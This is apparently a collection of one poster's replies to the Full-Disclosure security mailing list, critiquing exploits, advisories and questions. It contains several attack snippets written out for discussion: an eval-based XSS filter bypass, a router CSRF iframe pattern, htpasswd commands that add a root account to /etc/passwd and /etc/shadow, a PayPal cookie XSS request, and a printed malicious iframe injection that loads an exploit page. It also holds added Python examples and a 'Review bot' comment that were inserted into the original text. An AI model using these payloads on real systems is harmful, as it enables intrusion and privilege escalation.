>
> Well, no kidding. :-)
>
>> Maybe the flaws that will hound Chrome are due to the fact that it uses Safari as a codebase?

WebKit != Safari. Security-related bugs in rendering engines are pretty uncommon.
Re: [Full-disclosure] Klueless Klowns Team PHP shell
On 17 Aug 08, at 15:59, William McAfee wrote:
> For those of us who do not enjoy deciphering code with next to no comments, would you mind describing what exactly that code is supposed to do, how it does it, and why?

It's a PHP shell, often used on exploited systems. Doesn't appear to be significantly different from other versions in the wild, besides a few modified credits and the removal of certain automatic-update functions.
Re: [Full-disclosure] Step-by-step instructions for debugging Cisco IOS using gdb
On 15 Aug 08, at 11:20, Smiler S wrote:
> From: Andy Davis <iosftpexploit_at_googlemail.com>
> Date: Tue, 12 Aug 2008 22:01:37 +0100
>
>> Congratulations you are now debugging IOS ;-)
>>
>> One unusual feature, which I have yet to explain, is that when the registers are displayed they are all offset by 1 e.g:
>
> If a vector variable is stored in a register, gcc writes debug information telling gdb which register the variable is stored in. This mapping is changed between gcc2 and gcc3. Since there isn't anything in the debug output to distinguish code compiled by gcc3 from code compiled by gcc2, there is no way for gdb to know the right map. gdb supports the gcc3 map. If vector code is compiled by gcc2, as in the case of IOS, then the register assignment will be off by 1.

This isn't vector code, though - the whole register map is off. I'm not particularly familiar with IOS, but my guess is the debugging protocol is a little off from what GDB expects.
Re: [Full-disclosure] xss dot(.) filter evasion
On 18 Jun 08, at 08:49, Thomas Pollet wrote:
> I came across this site that implemented some filtering so the dots were replaced by an underscore, also the quotes and backslash were escaped. I came up with the code below to bypass this filtering (write anything to the page using String.fromCharCode). Someone knows a different way to do this?

eval makes everything easy. Well, reasonably easy.

eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/)));
Re: [Full-disclosure] exploit coding / Pentesting / 0day selling services
On 20 Apr 08, at 11:06, Jean Duboscs wrote:
> I am belgium.

And I am Spartacus?
Re: [Full-disclosure] gallarific backdoored , vulnerable to xss
On 15 Apr 08, at 09:07, Thomas Pollet wrote:
> I was looking at the free version of gallarific, and I found some suspicious code in the scopbin directory. Attached is a file I found in the zip I downloaded, in case someone wants to decode it.

Looks like a component of the ScopBin PHP obfuscator. It's not particularly hard to reverse, but I didn't bother.
Re: [Full-disclosure] 0day LINUX 0day LATEST
On 28 Jan 08, at 02:13, wejwklekl246 wrote:
> /* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
>  *
>  * afunixroot.c Linux kernel 2.6.x i386 local root exploit
> blah blah blah

Compiles a shared library in /tmp/own.so containing the functions

int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }

and executes /bin/sh with LD_PRELOAD=/tmp/own.so

Pretty lame. Protip: hellc0de containing lots of \x61-\x7f looks fake.
Re: [Full-disclosure] here
On 20 Dec 07, at 18:51, onion ring wrote:
> <snip>
> char sc[] = ...;
> <snip>

Abbreviated disassembly:

signal(SIGHUP, SIG_IGN)
something that looks like a 15-level deep fork() bomb
something involving kill()
unlink("/bin/login")
execve("//bin/rm", {"//bin/rm", "-rff", "*///"})

You could at least try to obfuscate your constants a little better. That was way too easy.
Re: [Full-disclosure] The Cookie Tools v0.3 -- first public release
On 10 Dec 07, at 05:45, michele dallachiesa wrote:
> why HTTPS is not the default in this type of services? this is a big silent hole. maybe, today is less silent :)

The short version is because hosting things with SSL is still hard. There's a few things which are significantly holding back the move to SSL web servers. They include:

* Every domain hosted with SSL must have a dedicated IP address. This basically rules out any form of shared hosting.
* SSL certificates don't come cheap. $50 seems like the low end right now, and the really big names (like Verisign or Thawte) charge several times that.
* Many common load-balancing products only work with unencrypted HTTP. Furthermore, SSL places a much higher load on the server.

Some of these things are set to change - for example, SNI is set to fix the first one. However, it's only just becoming available; it'll be a while before it can be relied on in production systems.
Re: [Full-disclosure] Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
On 13 Nov 07, at 18:08, XSS Worm XSS Security Information Portal wrote:
> We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any problem here:

OK, I'll bite...

<snip>
href="?page='.$_GET['page'].'&panel='.$_GET[panel].'">'.__('Reset filters', 'wp-slimstat').'</a>':).'
<input type="hidden" name="page" value="'.$_GET['page'].'" />
<input type="hidden" name="panel" value="'.$_GET[panel].'" />
<input type="hidden" name="fd" value="'.$_GET[fd].'" />
</form>';

Those all look like you could escape from the tag attribute with a well-placed double quote, assuming that there's no preprocessing on $_GET.
Re: [Full-disclosure] Suspicious URL in IDS
On 03 Nov 07, at 16:24, Kelly Robinson wrote:
> Is the following URL valid?
> http://[EMAIL PROTECTED]

Technically, yes. (It specifies that the client is to authenticate to www.sitenameremoved.ru with the username www.address.com.) It's often used in phishing attempts, though, as a sufficiently long username can be used to obscure the actual hostname and path.
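As an added example (not part of the original message), a small Python check that pulls the real host out of such a URL and flags userinfo that reads like a hostname or path; the sample URLs are constructed, reusing the placeholder names from the reply.

```python
"""Flag URLs whose userinfo ("user@host") could disguise the real hostname.

Added example for the thread above, not code from the original message. The
sample URLs are constructed; www.address.com and www.sitenameremoved.ru are
the placeholder names the reply itself used.
"""
from urllib.parse import urlsplit

# Userinfo containing any of these looks like a hostname or a path rather
# than a login name, which is the phishing trick the reply describes.
HOSTLIKE_HINTS = (".", "/", "%2f", "%2F", "%2e", "%2E")


def describe(url):
    """Split a URL into the parts a reader tends to confuse: the username
    (irrelevant to plain HTTP servers) and the host actually contacted."""
    parts = urlsplit(url)
    return {
        "scheme": parts.scheme,
        "username": parts.username,
        "password": parts.password,
        "real_host": parts.hostname,
        "path": parts.path,
    }


def looks_deceptive(url):
    """True when the URL carries a username that resembles a hostname or a
    path, i.e. the part a victim will read as the destination."""
    user = urlsplit(url).username
    if not user:
        return False
    return any(hint in user for hint in HOSTLIKE_HINTS)


def flag_urls(urls):
    """Return the subset of `urls` worth a closer look, with their real host."""
    return [(u, describe(u)["real_host"]) for u in urls if looks_deceptive(u)]


# Constructed sample: two plain links, one honest FTP login, two disguised.
SAMPLE_URLS = [
    "http://www.address.com@www.sitenameremoved.ru/",
    "http://www.example.org/index.html",
    "ftp://anonymous:guest@ftp.example.org/pub/",
    "http://www.bank.example%2Flogin@203.0.113.5/signin",
    "https://203.0.113.5/signin",
]

if __name__ == "__main__":
    for url, host in flag_urls(SAMPLE_URLS):
        print(f"suspicious: {url!r} actually connects to {host}")
```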
Re: [Full-disclosure] rPSA-2007-0212-1 util-linux
On 12 Oct 07, at 01:34, yearsilent wrote: could anybody explain this bug? I saw the git diff: - setuid(getuid()); - setgid(getgid()); + if(setgid(getgid()) 0) + die(EX_FAIL, _(umount: cannot set group id: %s), strerror(errno)); + + if(setuid(getuid()) 0) + die(EX_FAIL, _(umount: cannot set user id: %s), strerror(errno)); + not only root can do mount ? what condition could cause setuid failed ? setuid() fails if the operation would create more processes owned by the target user than the number specified by that user's process- count limit. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
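Review bot: the two new comparisons read `if(setgid(getgid()) 0)` and `if(setuid(getuid()) 0)`, with no operator between the call and `0`; as shown they would not compile, and the intended test is presumably `< 0` (the quoted diff appears to have lost the `<`). The substantive parts of the hunk are sound: the unchecked `- setuid(getuid()); - setgid(getgid());` calls are replaced by checked ones that `die()` on failure, so a privilege drop that silently fails can no longer be followed by the unmount running with privileges it was meant to have shed; and setgid() is now called before setuid(), the conventional order for dropping privileges. The trailing bare `+` line only adds an empty line and could be dropped.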
Re: [Full-disclosure] Report to Recipient(s)
On 09 Oct 07, at 20:04, [EMAIL PROTECTED] wrote:
> Sometimes I really do have to wonder about people. Obviously it wasn't a message that came from me since the blackberry.net in my email might be a good clue that I'm using a blackberry to do my emails (in case the T-Mobile tagline/nagline was an obvious enough hint as is). Now I wonder which bag of garbage spammer to thank for this since someone is obviously running around with my email addr and spamming.
> <snip>
> The file / html you received was infected with the Exploit-CVE2007-3845 virus and was deleted.

Actually, my guess would be that a message you sent (or that you quoted!) tripped someone's virus filter. CVE2007-3845 reads:

> Mozilla Firefox before 2.0.0.6, Thunderbird before 1.5.0.13 and 2.x before 2.0.0.6, and SeaMonkey before 1.1.4 allow remote attackers to execute arbitrary commands via certain vectors associated with launching a file handling program based on the file extension at the end of the URI, a variant of CVE-2007-4041. NOTE: the vendor states that it is still possible to launch a filetype handler based on extension rather than the registered protocol handler.

which sounds a lot like the topic that was being discussed.
Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug
On 28 Sep 07, at 19:25, wac wrote:
> On 9/28/07, Jimby Sharp [EMAIL PROTECTED] wrote:
>> How is this serious and is it related to security in any manner? If not, please do not spam. :-(
> Many bugs are security related (I would say all). How it is security related? Think. What happens if your bank calculates something wrong and puts the lower in your account and the higher in another account? Yes It might be little but what about a little many times? That could be done with javascript too. Then... you are not safe anymore.

If your bank is doing financial calculations using Javascript in a standard web browser, you have bigger things to worry about than roundoff errors.
Re: [Full-disclosure] python = 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module
On 15 Sep 07, at 16:53, Slythers Bro wrote:
> The module imageop contains a lot of int overflows, which result in heap overflow, and maybe memory dump. The files imageop.c and rbgimgmodule.c are examples.
> <snip>

The real question: Does anybody actually use those modules? Most Python programs that I've seen that do image processing use other methods, like PIL or calling out to Imagemagick. A bit of searching on Google Code Search didn't find me anything that actually used imageop or rgbimgmodule except test cases for those modules. rgbimgmodule isn't even part of a standard build of Python 2.5.

Remember that Python is *not* a managed language - there are no guarantees of safety inherent in the language. In fact, there are easier ways to execute native code: take a look at ctypes, for example.

While I'd definitely classify the behavior you've identified as a bug, it's unlikely to be exploitable in the context of any programs which use it (if, indeed, there are any).
Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.
On 05 Aug 07, at 15:48, Beyond Security wrote:
> /*
>  * off by one ebp overwrite in sudo prompt parsing function
>  * discovered by beyond security in 2007, thx ge
>  *
>  * to compile: gcc -pipe -o sobo sobo.c ; ./sobo
>  *
>  * please use responsibly! a patch has already been sent
>  * upstream and a fix will be included in the next sudo release
>  *
>  */
> <snip>

Smashes its own stack and runs "rm -rf ~ /". Very clever.
Re: [Full-disclosure] Does this exist ?
On 05 Jul 07, at 06:20, Dan Becker wrote:
> I have an idea that won't leave me alone and this list seems to have the most potential for knowing if the idea exists. My apologies for a somewhat offtopic post. Would there be a way to create a rainbow table of tcp packets to be used to generate one packet for every 1000 or so normal packets simply by matching hashes with databases on both ends?

No; for a 128-bit hash (for example) there are only 2^128 packets which can be uniquely represented. This is far below the 2^12144 1518-byte packets which are possible, so - by the pigeonhole principle - there will be collisions. Increasing the hash size won't help unless you make it at least as large as the packet, at which point you aren't gaining anything.

Computing such a rainbow table is computationally impossible, anyway. The largest keyspace which I know of that's been brute-forced was somewhere around 64 bits, and that takes either dedicated hardware or a distributed-computing network. 128 bits is believed to be physically impossible, and even that is just barely enough to fit a TCP header into, without any data.

If the data being transmitted over the link is reasonably redundant, then you might get lucky and be able to just hash the relevant packets ahead of time. However, you could probably do even better with a purpose-built compression scheme anyway.
Re: [Full-disclosure] How to protect RFI ??
On 27 May 07, at 19:41, Mark Sec wrote:
> G00d thanks, does any1 know a tool for looking vulnerabilities inside of my *.php files? or something to automate the search for vulnerabilities?

find /php/dir -name '*.php' -print0 | xargs -0 egrep '(include|require)(_once)?\(.*\$'
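An added Python example, not from the original reply, that extends the egrep one-liner above: it walks a tree of *.php files, reports each variable-driven include/require with file and line, and marks the ones fed by $_GET/$_POST/$_REQUEST/$_COOKIE either directly or through an earlier assignment in the same file. The PHP source it scans is constructed and the function names are mine.

```python
"""Audit PHP sources for include/require statements whose path comes from a
variable, and flag those fed (directly or via an assignment) by request data.

Added example that expands the egrep one-liner in the reply above; it is not
part of the original message. Everything here is a crude, single-file,
regex-based check; the SAMPLE_PHP source is constructed for the demo.
"""
import os
import re
import tempfile

INCLUDE_RE = re.compile(
    r"\b(include|require)(_once)?\b\s*\(?\s*(?P<expr>[^;]*)", re.IGNORECASE)
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*\.?=\s*(?!=)(?P<rhs>[^;]*)")
VAR_RE = re.compile(r"\$[A-Za-z_]\w*")


def scan_source(text, filename="<string>"):
    """Return (filename, lineno, severity, code) for each variable-driven
    include.  HIGH means request data reaches the path within this file;
    REVIEW means the path is a variable whose origin was not seen here."""
    findings = []
    tainted = set()          # variables assigned from request data so far
    for lineno, line in enumerate(text.splitlines(), start=1):
        code = line.split("//", 1)[0]        # ignore trailing line comments
        for m in ASSIGN_RE.finditer(code):   # propagate taint through '='
            rhs = m.group("rhs")
            if SUPERGLOBAL_RE.search(rhs) or set(VAR_RE.findall(rhs)) & tainted:
                tainted.add(m.group(1))
        m = INCLUDE_RE.search(code)
        if not m or "$" not in m.group("expr"):
            continue                         # literal path: not an RFI sink
        expr = m.group("expr")
        if SUPERGLOBAL_RE.search(expr) or set(VAR_RE.findall(expr)) & tainted:
            severity = "HIGH"
        else:
            severity = "REVIEW"
        findings.append((filename, lineno, severity, line.strip()))
    return findings


def scan_dir(root):
    """Scan every *.php file under `root`, like the find | xargs pipeline."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), path))
    return findings


SAMPLE_PHP = """<?php
// constructed sample: a safe include, two request-driven ones, one unclear
require_once('config.php');
$page = $_GET['page'];
$tpl  = 'templates/' . $page . '.php';
include($tpl);
include 'header.php';
$lang = $config['lang'];
require("lang/$lang.php");
require($_REQUEST['mod'] . '.php');
"""


def demo():
    """Write SAMPLE_PHP into a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(SAMPLE_PHP)
        return scan_dir(root)


if __name__ == "__main__":
    for path, lineno, severity, code in demo():
        print(f"{severity:6} {os.path.basename(path)}:{lineno}: {code}")
```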
Re: [Full-disclosure] TCP/IP vulnerability
On 23 May 07, at 08:27, Mohit Kohli wrote:
> Thanks for the reply but have some concerns...
> 1) Teardrop and land attack work on win 95 server, how to exploit this vulnerability or its variant on windows 2000 or linux.

I don't know about Windows 2000, but Linux doesn't appear to have ever been affected by LAND, and Teardrop was protected against with 2.0.32. Getting a kernel that old to run will be very difficult unless you've got a copy of some *really* old distribution handy.
Re: [Full-disclosure] Is OWASP vulnerable ??
On 10 Mar 07, at 09:23, Scarlet Pimpernel wrote:
> Hello all,
> There is an undefined function in OWASP website's javascript code (wikibits.js) called wgBreakFrames. This can cause potential damage to the site if used maliciously.
> ...
> if (wgBreakFrames) {
> ...

First of all, that's a variable, not a function. Creating a function called wgBreakFrames wouldn't execute the function.

Second of all, I'm not really sure how that could be used maliciously. If you're able to inject Javascript into the window context, you can already do whatever you like to the user's browser. So I'm not quite sure how this is supposed to cause potential damage to the site.
Re: [Full-disclosure] Drive-by Pharming Threat
On 19 Feb 07, at 09:54, [EMAIL PROTECTED] wrote:
> I am curious as to how one automatically logs on?

Memorized passwords. Also, if a password is required for a subsidiary resource, the browser will ask the user for it. In IE, at least, a sequence like the one I describe below will pop up a series of password dialogs if the user attempts to cancel. Most users will eventually try typing in the correct password to try to make the password dialogs go away.

> Also when you do reset or change parameters in the router, does it not require a reboot of the router (auto after you hit save), whereby your connection is lost for x amount of time?

Depends on the router. It doesn't really matter much, though - once the settings are saved the damage's been done.

> Also not to mention find a method to cross domains into the routers html, for each and every router out there.

Try them all at once:

<iframe src="http://192.168.0.1/csrf-for-one-router"></iframe>
<iframe src="http://192.168.0.1/csrf-for-another-router"></iframe>
<iframe src="http://192.168.0.1/csrf-for-a-third-router"></iframe>
<iframe src="http://192.168.0.1/csrf-for-a-fourth-router"></iframe>
...
Re: [Full-disclosure] Drive-by Pharming Threat
On 19 Feb 07, at 20:36, Gaurang Pandya wrote:
> just wondering why cant simple perl script be used instead??

Because it's easy to write a web page to make a user run some Flash. Making a user run Perl isn't so easy.
Re: [Full-disclosure] Digital Mechanical Lock Unsafe
On 11 Feb 07, at 15:39, Clark Mills wrote:
> The model of lock that this article is based on is a Lockwood DX DIGITAL LOCK. I'd expect all similarly styled locks to be similarly flawed.

Nope, it's probably just that model. The digital-mechanical locks that I've seen are dependent on both the sequencing of buttons pressed (1,2,3 vs. 2,1,3) and the combinations in which buttons are pressed. Some can use codes which include button chords (1+2,3 vs. 1,2+3).
Re: [Full-disclosure] Remove all admin-root authorization prompts from OSX
On 24 Jan 07, at 17:20, K F (lists) wrote:
> http://www.petitiononline.com/31337OSX/petition.html

The petition reads, in part:

> In efforts to minimize the apparently unnecessary dialog boxes that ask for permission to go from gid=admin to uid=root we are hereby petitioning Apple to remove any further use of dialog boxes when making the transition from gid=0 to uid=0. Since the admin group is ALREADY root why can't you just stop asking us for authorization?

Do your research next time. gid=admin isn't root:

powerbook% id
uid=1000(me) gid=1000(me) groups=1000(me),81(appserveradm),79(appserverusr),80(admin)

... it's just an ordinary group with sudo, write privileges to some special folders, and some extra SecurityAgent magic in /etc/authorization.
Re: [Full-disclosure] code release: cryptographic attack tool
On 12 Jan 07, at 08:05, Slythers Bro wrote:
> hi, sorry but i know nothing about the real physical quantic theory, i'm not a physician, i just know there are 3 states: 0, 1 and unknown...

This approach won't work for anything beyond the most trivial cryptographic computations: attempting to reverse MD5 through basic logic like this will stall as soon as you come to an operation where both operands are unknown. In MD5, this will occur at the stage where the message is added to word A in the 64th round. By the time you get to the end of the 60th round, all bits will be unknown.

Any attack on a cryptosystem (such as MD5) of this form will need to take into account complex correlations between bits. To carry your quantum-physics analogy a bit further, you need to be able to keep track of entanglement between bits. However, the storage necessary to carry out such an attack on a large system like MD5 may very well be large enough as to be completely infeasible (i.e., above 2^48 bits).
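As an added example (a constructed toy model, not the poster's tool), Python code that implements the three-state bit logic and pushes it through MD5-style steps with the message words unknown, counting unknown bits after each step; it also shows the correlation problem the reply raises, where u XOR u comes out unknown although it is really 0. The function names are mine; the only MD5 material used is the standard IV, the round-1 F function and the first round constant.

```python
"""Three-valued (0 / 1 / unknown) bit propagation through MD5-style operations.

Added example illustrating the reply above. It is a constructed toy model of
the "0, 1 and unknown" approach, not the poster's tool and not a complete
MD5: a word is a list of 32 bits, least significant first, each 0, 1 or None.
"""
WIDTH = 32

def t_not(a):
    return None if a is None else 1 - a

def t_and(a, b):
    if a == 0 or b == 0:          # a known 0 decides the result on its own
        return 0
    return 1 if a == 1 and b == 1 else None

def t_or(a, b):
    if a == 1 or b == 1:          # a known 1 decides the result on its own
        return 1
    return 0 if a == 0 and b == 0 else None

def t_xor(a, b):
    return None if a is None or b is None else a ^ b   # no dominant value

def word(value):
    """Fully known 32-bit word from an int."""
    return [(value >> i) & 1 for i in range(WIDTH)]

def unknown_word():
    return [None] * WIDTH

def to_int(w):
    """Integer value of a fully known word, or None if any bit is unknown."""
    return None if None in w else sum(b << i for i, b in enumerate(w))

def unknown_bits(w):
    return sum(1 for b in w if b is None)

def w_and(x, y): return [t_and(a, b) for a, b in zip(x, y)]
def w_or(x, y):  return [t_or(a, b) for a, b in zip(x, y)]
def w_xor(x, y): return [t_xor(a, b) for a, b in zip(x, y)]
def w_not(x):    return [t_not(a) for a in x]

def w_add(x, y):
    """Ripple-carry addition mod 2^32; an unknown carry spreads upward."""
    out, carry = [], 0
    for a, b in zip(x, y):
        s = t_xor(a, b)
        out.append(t_xor(s, carry))
        carry = t_or(t_and(a, b), t_and(s, carry))
    return out

def w_rotl(x, n):
    n %= WIDTH
    return x[WIDTH - n:] + x[:WIDTH - n]

def md5_f(b, c, d):
    """MD5 round-1 boolean function F = (B & C) | (~B & D)."""
    return w_or(w_and(b, c), w_and(w_not(b), d))

def md5_step(a, b, c, d, k, m, s):
    """One MD5-style step: A' = B + rotl(A + F(B,C,D) + K + M, s)."""
    t = w_add(w_add(w_add(a, md5_f(b, c, d)), k), m)
    return w_add(b, w_rotl(t, s))

IV = (0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476)   # MD5 initial state

def propagate(steps, k=0xd76aa478, s=7):
    """Run `steps` steps from the IV with every message word unknown and
    return the unknown-bit count of (A, B, C, D) after each step."""
    a, b, c, d = (word(v) for v in IV)
    history = []
    for _ in range(steps):
        a, b, c, d = d, md5_step(a, b, c, d, word(k), unknown_word(), s), b, c
        history.append(tuple(unknown_bits(w) for w in (a, b, c, d)))
    return history

# The model also shows why plain three-valued logic is not enough: u XOR u is
# really 0, but without tracking that both operands are the *same* unknown
# (the "entanglement" the reply mentions) every bit comes out unknown.
def lost_correlation():
    u = unknown_word()
    return unknown_bits(w_xor(u, u))   # 32, although the true value is 0
```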
Re: [Full-disclosure] any idea what is going on here?
On 04 Jan 07, at 13:37, Ian Shaw wrote:
> A website that I am developing has had BackDoor-CUS!php uploaded to the images directory. My fault entirely, due to permissions set. This has resulted in
>
> <html><script language="javascript">
> s=unescape("...");
> document.writeln(s);document.close();
> </script></html>
>
> being added to the top of index.php. Unencoded this reads
>
> <iframe src="http://www.nownames.org/images/in.php?adv=3" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE>
>
> When I go to this an applet appears to run but I am not sure what it is doing. Closed my browser out of fear. Does anyone know what it is attempting to do?

The iframe source loads an obfuscated Javascript which, when decoded, loads a Java applet and subsequently attempts several exploits.

I have disassembled the Java applet. It contains some obfuscation of its own, defining classes at runtime from inline byte arrays. It appears to exploit the Microsoft Java VM by overloading SecurityClassLoader at runtime.

One is against a number of ActiveX plugins which implement CreateObject or GetObject methods which may be used to create a WScriptShell. The class IDs of the plugins in question are:

If such a plugin is found, the script loads and runs a small Windows executable. I have not fully analyzed this executable, but it appears to be a downloader which is not identified by Kaspersky. It loads a third executable in MS-DOS format from another site. None of my tools can disassemble this, but Kaspersky identifies it as Trojan-Downloader.Win32.Small.avw: *another* loader.

Following this, the decrypted script contains part of another exploit. The exploit is truncated, so I'm not sure exactly what it's targeting. There's a lot of Unicode shellcode escaping going on, but the final attack is missing. This may be due to a bug in the decryption routine.

All files are available on request, if anyone's interested in doing some further analysis of their own.

That was fun :)
Re: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability
On 02 Jan 07, at 12:20, Matias Soler wrote:
> Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability
> Version: 1.3.37 (latest 1.3.xx)
> Product: Apache htpasswd utility
> Issue: A buffer overflow vulnerability has been found, it is dangerous only on environment where the binary is suid root.

If htpasswd is setuid, then one could just as easily:

htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh
htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:9:7:::

and get root. (Or any number of things - sudoers, crontab, SSH keys - take your pick.)

It's possible that this buffer overflow may be significant in very limited circumstances - if the utility is executed from a web application, perhaps. However, this seems like a rather limited-scope issue.

-- Andrew Farmer
Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture
On 08 Dec 06, at 12:47, Evan Stawnyczy wrote:
> ^ My name is Evan ($LastNameNotDisclosed$).

Nice job with the last-name-non-disclosure.
Re: [Full-disclosure] [x0n3-h4ck.org] PayPal vulnerable to XSS
On 04 Nov 06, at 11:39, [EMAIL PROTECTED] wrote:
> this is a request, that I have passed server to the web, complete of the code that would allow the xss:
>
> GET / HTTP/1.0
> Accept: */*
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
> Host: www.paypal.com
> Cookie: cookie_check=yes;feel_cookie= <snip big session cookies> LANG=--ScRiPt%20%0a%0dalert(1234567890)%3B/ScRiPt <snip more cookies>
> Connection: Close
> Pragma: no-cache

That's not exploitable. Remember that the XS in XSS stands for cross-site: you have to be able to trigger the scripting using ordinary requests from another site. To generate this cookie, you'd need to already have scripting access to the paypal.com domain - in which case you don't care anymore.
Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
On 22 Oct 06, at 04:29, [EMAIL PROTECTED] wrote:
> even if they have ssh access, there is still nothing they can do, except to create two files in their $HOME directories containing expressions from paths.h and sysexits.h? Why would that be considered a backdoor?

The awk commands parse out the strings /etc/passwd and /etc/shadow from the headers. It's still rather easily detected - most of the rootkit-checking programs will detect an alternate uid0 account very quickly - but it does demonstrate an interesting way of avoiding target strings in the binary.
Re: [Full-disclosure] Googling:Google Meta Bugs
On 10 Oct 06, at 18:29, Aditya Sood wrote:
> This post deals with the googling effects that google provide with its search engine. Since in searching algorithms the metacharacters are handled with proper filtering techniques which we have not seen it in google. Already explanation given to google but i think they are getting googled not to handled these unexceptional searches. What we call it...

I tried several of the searches listed, and observed no unusual behavior in the search results. A number of the searches yielded very few results due to misspelled keywords (like filtetype). Have you really tried any of these searches, or are you just generating queries at random?
Re: [Full-disclosure] Googling:Google Meta Bugs
On 11 Oct 06, at 08:07, Aditya Sood wrote:
> Hey what ever you suppose to. Well if google has accepted it so better you should too. Check Down : Response from google
> Well i dont want to say anything more about nerd talk. Better to accept new stuff ok not stoic
>
> -------- Original Message --------
> Subject: Re: [#55295087] Flaw In Google Search Engine
> From: [EMAIL PROTECTED]
> Date: Fri, April 28, 2006 11:38 am
> To: Aditya Sood [EMAIL PROTECTED]
>
> Thank you for your note. Please rest assured that Google never inserts jokes or sends messages by changing the order of its results. Occasionally, when a particular website is the subject of public attention, other sites begin linking to it. This may elevate its importance as gauged by our ranking software, which assigns a PageRank value based in part on who links to a given page. Higher ranking in Google results may lead to more awareness, which may lead to more links and so on. One side effect of not using an editorial viewpoint to determine the ranking of results is that anomalies occasionally occur. We view such occasions as opportunities for us to learn more about how the web works and how to improve our algorithms for all searches in the future.
>
> Regards,
> The Google Team

Translation: Nothing to see here, move along. Google hasn't accepted anything in that response.
Re: [Full-disclosure] Googling:Google Meta Bugs
On 10 Oct 06, at 19:53, Aditya Sood wrote:
> Andrew Farmer wrote:
>> On 10 Oct 06, at 18:29, Aditya Sood wrote:
>>> This post deals with the googling effects that google provide with its search engine. Since in searching algorithms the metacharacters are handled with proper filtering techniques which we have not seen it in google. Already explanation given to google but i think they are getting googled not to handled these unexceptional searches. What we call it...
>> I tried several of the searches listed, and observed no unusual behavior in the search results. A number of the searches yielded very few results due to misspelled keywords (like filtetype). Have you really tried any of these searches, or are you just generating queries at random?
> A] Do check you are making search with advanced IM Feeling Lucky Button
> B] Its all working previously and have been reported to google. May be they have set changes but do try it will provide results which is not at all possible for search engines.

I tried several of the suggested queries again, both with and without I'm Feeling Lucky. None of them produced any anomalous behavior. What are we supposed to be looking for, exactly?
Re: [Full-disclosure] repeated port 21 attempts
On 6/13/06, Ken Dunham [EMAIL PROTECTED] wrote:
>> I'm getting port 21 connection attempts every 5 minutes from about half a dozen of my network users.
> Hi, Sounds like FTP and SSH attacks that are opportunistically launched by Romanian attackers to date...

Given that the connections are coming from his own network, I seriously doubt the FTP connection attempts are the work of Romanian hackers. (Unless Mr. Wu's network is in Romania.)
Re: Re: [Full-disclosure] repeated port 21 attempts
On 6/13/06, Jacob Wu [EMAIL PROTECTED] wrote:
> They are all non routable 10.x.x.x IPs. This is for a residence hall at my University. Residents, when they first turn on their computers, are given a 10.x.x.x IP and made to register and agree with the network use policy. Once they do that they are given a real IP and thus access to the internet.

Are you doing something weird with DNS that's making this one machine's address show up on lookups, or messing with routing so that everything gets redirected to this box? If so, I'd wonder if this is some sort of bot that you're seeing that's trying to call home with FTP. It might behoove you to (kindly) ask the owner of one of the machines to let you take a look at their machine to see what it's doing.

> Someone sent me this link: Try websnarf: http://www.unixwiz.net/tools/websnarf-1.04 But it gives me less information than iptables does.

You may have to modify it to better imitate an FTP server - it was written for use as a faux HTTP server. In particular, the client may be waiting for a banner and/or greeting before it makes a request.
Re: [Full-disclosure] Advisory - D-Link Access Point
On 06 Jun 06, at 18:10, news wrote:
> INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
> http://www.intruders.com.br/ http://www.intruders.org.br/
> ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
> PRIORITY: HIGH
> I - INTRUDERS: Intruders Tiger Team Security is a project entailed with Security Open Source (http://www.securityopensource.org.br). The Intruders Tiger Team Security (ITTS) is a group of researchers with more than 10 years of experience, specialized in the development of intrusion projects (Pen-Test) and in special security projects. All the projects of intrusion (Pen-Test) realized until the moment by the Intruders Tiger Team Security had 100% of success.
> II - INTRODUCTION: D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g): D-Link, the industry pioneer in wireless networking, introduces a performance breakthrough in wireless connectivity – D-Link AirPlus Xtreme GTM series of high-speed devices now capable of delivering transfer rates up to 15x faster than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access points. D-Link DWL-2100ap is one of the most popular Access Point in the world

Wall of text hits you for 652275 damage. You die.
Re: [Full-disclosure] Is your security 6/6/6 ready?
On 04 Jun 06, at 15:13, Aaron Gray wrote:

> > (*) That's *really* drunk: http://www.eforu.com/jokes/bartender/23.html
>
> That contains (possibly multiple) IE exploits.

Are you sure? All I can see is tacky ads... an IFRAME tag does not an exploit make.
[Full-disclosure] -Advisory- + x Thu Mar 16 21:01:19 EST 2006 x + Heap Overflow in Microsoft Excel
-Advisory- + x Thu Mar 16 21:01:19 EST 2006 x + Heap Overflow in Microsoft Excel

o/ å

Description

It is possible to make Microsoft Excel crash or run arbitrary code by the use of malformed input.

Contact

